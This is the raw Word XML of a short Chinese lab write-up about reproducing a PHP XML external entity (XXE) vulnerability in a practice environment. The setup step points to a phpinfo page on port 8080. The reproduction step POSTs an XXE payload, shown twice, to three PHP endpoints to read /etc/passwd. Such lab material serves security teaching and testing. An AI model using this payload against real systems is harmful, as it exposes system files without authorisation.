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E4" w:rsidRPr="006E7288" w:rsidRDefault="006E7288">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288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6E7288" w:rsidRDefault="006E728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288" w:rsidRDefault="006E7288">
                            <w:r w:rsidRPr="006E7288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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288">
                      <w:r w:rsidRPr="006E7288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E7288" w:rsidRDefault="006E7288">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:r>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的/</w:t>
      </w:r>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可看到p</w:t>
      </w:r>
      <w:r>
        <w:t>hpinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758375AB" wp14:editId="288CB272">
            <wp:extent cx="5274310" cy="3208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88" w:rsidRDefault="006E7288">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向发送</w:t>
      </w:r>
      <w:r w:rsidR="00BF401A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BF401A" w:rsidRPr="00BF401A">
        <w:t>dom.php</w:t>
      </w:r>
      <w:r w:rsidR="00BF401A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF401A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BF401A" w:rsidRPr="00BF401A">
        <w:t>SimpleXMLElement.php</w:t>
      </w:r>
      <w:r w:rsidR="00BF401A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF401A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或 /</w:t>
      </w:r>
      <w:r>
        <w:t>simplexml_load_string.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r w:rsidR="00913697">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00913697">
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidR="00CD153C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功读取/</w:t>
      </w:r>
      <w:r w:rsidR="00CD153C">
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5228492" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1079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84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288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="utf-8"?&gt; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;!DOCTYPE xxe [</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;!ELEMENT name ANY &gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;root&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;name&gt;&amp;xxe;&lt;/name&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                            <w:r w:rsidRPr="006E7288">
                              <w:t>&lt;/root&gt;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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="utf-8"?&gt; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;!DOCTYPE xxe [</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;!ELEMENT name ANY &gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;root&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRPr="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;name&gt;&amp;xxe;&lt;/name&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="006E7288" w:rsidRDefault="006E7288" w:rsidP="006E7288">
                      <w:r w:rsidRPr="006E7288">
                        <w:t>&lt;/root&gt;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E7288" w:rsidRDefault="006E72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11ECE6" wp14:editId="7208FFBB">
            <wp:extent cx="5274310" cy="4231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1A9" w:rsidRDefault="003531A9" w:rsidP="006E7288">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003531A9" w:rsidRDefault="003531A9" w:rsidP="006E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1A9" w:rsidRDefault="003531A9" w:rsidP="006E7288">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003531A9" w:rsidRDefault="003531A9" w:rsidP="006E7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7A"/>
    <w:rsid w:val="002A5C7A"/>
    <w:rsid w:val="003531A9"/>
    <w:rsid w:val="006E7288"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="00913697"/>
    <w:rsid w:val="00BF401A"/>
    <w:rsid w:val="00CD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206AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{813E29A2-0777-4A63-A4E4-36012057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2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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-29T10:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T10:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>